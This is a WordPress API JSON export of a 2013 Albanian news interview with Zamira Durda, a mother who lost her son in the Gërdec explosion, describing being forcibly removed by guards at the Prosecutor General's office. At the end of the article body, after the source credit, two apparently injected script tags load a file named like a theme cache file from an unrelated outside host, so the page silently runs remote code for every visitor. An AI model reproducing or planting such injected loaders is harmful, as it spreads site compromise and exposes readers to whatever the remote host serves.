{"id":324,"date":"2013-09-25T20:35:51","date_gmt":"2013-09-25T20:35:51","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=324"},"modified":"2013-09-27T23:00:37","modified_gmt":"2013-09-27T21:00:37","slug":"intervista-zamira-durda-shkova-per-te-kerkuar-denimin-e-mediut-me-dhunuan-gardistet","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=324","title":{"rendered":"INTERVISTA\/ Zamira Durda: Shkova p\u00ebr t\u00eb k\u00ebrkuar d\u00ebnimin e Mediut, m\u00eb \u201cdhunuan\u201d gardist\u00ebt"},"content":{"rendered":"<p>Zamira Durda, gruaja q\u00eb n\u00eb tragjedin\u00eb e G\u00ebrdecit ka humbur djalin e saj 6- vje\u00e7ar, Edisonin, \u00ebsht\u00eb e vetmja q\u00eb endet dyerve t\u00eb gjykatave n\u00eb k\u00ebrkim t\u00eb drejt\u00ebsis\u00eb.<\/p>\n<p>K\u00ebshtu ka ndodhur dhe dit\u00ebn e djeshme.<\/p>\n<p>N\u00eb Gjykat\u00ebn e Lart\u00eb, Zamira Durda ka marr\u00eb dosjen ku \u00ebsht\u00eb vendosur p\u00ebr mospranimin e rekursit ndaj vendimit t\u00eb Gjykat\u00ebs s\u00eb Apelit, e cila praktikisht i dhuroi lirin\u00eb t\u00eb d\u00ebnuarve t\u00eb k\u00ebsaj tragjedie.<\/p>\n<p>Me dosjen voluminoze n\u00eb dor\u00eb, n\u00ebna e djalit t\u00eb vrar\u00eb ka mbajtur frym\u00ebn n\u00eb Prokurorin\u00eb e P\u00ebrgjithshme, aty ku Zamira kishte fijen e vetme t\u00eb shpres\u00ebs p\u00ebr drejt\u00ebsis\u00eb.<\/p>\n<p>E n\u00eb vend q\u00eb t\u00eb takohej me kryeprokurorin, Zamira Durda \u00ebsht\u00eb p\u00ebrz\u00ebn\u00eb dhunsh\u00ebm nga ambientet e k\u00ebtij institucioni, jo vet\u00ebm pa marr\u00eb nj\u00eb p\u00ebrgjigje, por edhe e denigruar n\u00eb syt\u00eb t\u00eb kalimtar\u00ebve t\u00eb shumt\u00eb.<\/p>\n<p>P\u00ebr TemA-n, Zamira Durda rr\u00ebfen ngjarjen si dhe vendimin, sipas t\u00eb cilit tashm\u00eb i \u00ebsht\u00eb v\u00ebn\u00eb kapak drejt\u00ebsis\u00eb mbi tragjedin\u00eb e G\u00ebrdecit.<\/p>\n<p><b>Znj. Zamira, a mund t\u00eb na thoni \u00e7far\u00eb ka ndodhur me ju?<\/b><\/p>\n<p>N\u00eb fakt, ajo q\u00eb ka ndodhur \u00ebsht\u00eb tejet posht\u00ebruese p\u00ebr mua. Jo drejt\u00ebsi q\u00eb nuk po gjejm\u00eb, por tashm\u00eb ne, familjar\u00ebt e viktimave t\u00eb tragjedis\u00eb s\u00eb G\u00ebrdecit, nuk na d\u00ebgjon m\u00eb askush. Vet\u00ebm fjala na ka mbetur, por edhe p\u00ebr k\u00ebt\u00eb \u00ebsht\u00eb shum\u00eb e v\u00ebshtir\u00eb.<\/p>\n<p><b>Por \u00e7far\u00eb ka ndodhur?<\/b><\/p>\n<p>Un\u00eb t\u00eb mart\u00ebn mora vendimin e zbardhur t\u00eb Gjykat\u00ebs s\u00eb Lart\u00eb, e cila refuzonte k\u00ebrkes\u00ebn e Prokuroris\u00eb s\u00eb P\u00ebrgjithsh\u00ebm p\u00ebr t\u00eb anuluar vendimin e Gjykat\u00ebs s\u00eb Apelit mbi t\u00eb akuzuarit e tragjedis\u00eb s\u00eb G\u00ebrdecit. Gjykata e Lart\u00eb nuk pranoi rekursin dhe un\u00eb shkova n\u00eb Prokurorin\u00eb e P\u00ebrgjithshme p\u00ebr t\u00eb takuar z.Llalla,\u00a0 p\u00ebr t\u00eb ditur \u00e7do t\u00eb b\u00ebhet tashm\u00eb me ne, me familjar\u00ebt e k\u00ebsaj\u00a0 tragjedie, q\u00eb ende jemi n\u00eb k\u00ebrkim t\u00eb drejt\u00ebsis\u00eb.<\/p>\n<p>M\u00eb than\u00eb q\u00eb t\u00eb prisja se z. Llalla \u00ebsht\u00eb tejet i z\u00ebn\u00eb. Prita aty tek kangjellat e prokuroris\u00eb deri n\u00eb or\u00ebn 11:00. Pyes prap\u00eb e m\u00eb thon\u00eb se kryeprokurori po takon ambasadorin Amerikan. S\u00ebrish po prisja deri sa shkoi ora 12:00.<\/p>\n<p>N\u00eb k\u00ebt\u00eb koh\u00eb, roja m\u00eb thot\u00eb se kryeprokurori do t\u00eb dilte p\u00ebr nj\u00eb takim t\u00eb r\u00ebnd\u00ebsish\u00ebm tek 15-kat\u00ebshi. Meqen\u00ebse nuk po m\u00eb priste njeri, mendova t\u2019i dilja para makin\u00ebs, s\u00eb paku p\u00ebr t\u00eb b\u00ebr\u00eb nj\u00eb bised\u00eb t\u00eb shkurt\u00ebr me t\u00eb. Por n\u00eb vend q\u00eb t\u00eb takoja kryeprokurorin, erdh\u00ebn punonj\u00ebsit e gard\u00ebs, t\u00eb cil\u00ebt m\u00eb shtyn\u00eb dhunsh\u00ebm n\u00eb rrug\u00ebn kryesore, pa mundur q\u00eb t\u2019i them z.Llalla q\u00eb kisha kat\u00ebr or\u00eb q\u00eb e prisja aty. Kjo sjellje ishte e paimagjinueshme p\u00ebr mua. Ishte nj\u00eb trajtim aspak i denj\u00eb p\u00ebr ne, q\u00eb n\u00eb fund t\u00eb fundit k\u00ebrkojm\u00eb vet\u00ebm drejt\u00ebsi n\u00ebp\u00ebr dyert e institucioneve t\u00eb shtetit shqiptar.<\/p>\n<p><b>Z. Zamira, po p\u00ebr \u00e7far\u00eb donit ta takonit Prokurorin e P\u00ebrgjithsh\u00ebm?<\/b><\/p>\n<p>Me k\u00ebt\u00eb vendim t\u00eb dh\u00ebn\u00eb nga Gjykata e Lart\u00eb, juridikisht \u00ebsht\u00eb e mbyllur dosja e tragjedis\u00eb s\u00eb G\u00ebrdecit. I vetmi institucion q\u00eb mund ta b\u00ebj\u00eb ankimimin p\u00ebr k\u00ebt\u00eb \u00e7\u00ebshtje \u00ebsht\u00eb Prokurori i P\u00ebrgjithsh\u00ebm. Ai mund ta \u00e7oj\u00eb vendimin e Gjykat\u00ebs s\u00eb Lart\u00eb n\u00eb\u00a0 Gjykat\u00ebn Kushtetuese. P\u00ebr t\u00eb ditur n\u00ebse Prokuroria e P\u00ebrgjithshme do t\u00eb nd\u00ebrmarr\u00eb k\u00ebt\u00eb hap, doja t\u00eb takoja z.Llalla. Nj\u00eb \u00e7\u00ebshtje tjet\u00ebr, q\u00eb un\u00eb doja t\u00eb dija ishte, n\u00ebse do t\u00eb nisnin hetimet ndaj Fatmir Mediut. Tashm\u00eb p\u00ebr t\u00eb hetuar ndaj k\u00ebtij njeriu, q\u00eb n\u00eb koh\u00ebn q\u00eb ndodhi tragjedia ishte Minist\u00ebr i Mbrojtjes, nuk ka m\u00eb asnj\u00eb penges\u00eb ligjore. Ai nuk ka imunitet. Por n\u00eb vend q\u00eb t\u00eb merrja p\u00ebrgjigje, u denigrova n\u00eb sy t\u00eb qindra kalimtar\u00ebve, pasi p\u00ebrball\u00eb Prokuroris\u00eb s\u00eb P\u00ebrgjithshme ndodhet dhe ambulanca qendrore e Tiran\u00ebs.<\/p>\n<p><b>Z. Zamira, ju ende besoni tek drejt\u00ebsia shqiptare p\u00ebr k\u00ebt\u00eb dosje?<\/b><\/p>\n<p>Me vendimet q\u00eb jan\u00eb dh\u00ebn\u00eb dhe me m\u00ebnyr\u00ebn q\u00eb ne trajtohemi, nuk kam m\u00eb asnj\u00eb shpres\u00eb. Por un\u00eb nuk do t\u00eb heq dor\u00eb kurr\u00eb pa d\u00ebnuar autor\u00ebt e vrasjes s\u00eb tim biri.<\/p>\n<p>Burimi: Gazeta Tema<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Zamira Durda, gruaja q\u00eb n\u00eb tragjedin\u00eb e G\u00ebrdecit ka humbur djalin e saj 6- vje\u00e7ar, Edisonin, \u00ebsht\u00eb e vetmja q\u00eb [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":325,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/324"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=324"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/324\/revisions"}],"predecessor-version":[{"id":326,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/324\/revisions\/326"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/325"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=324"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=324"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=324"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}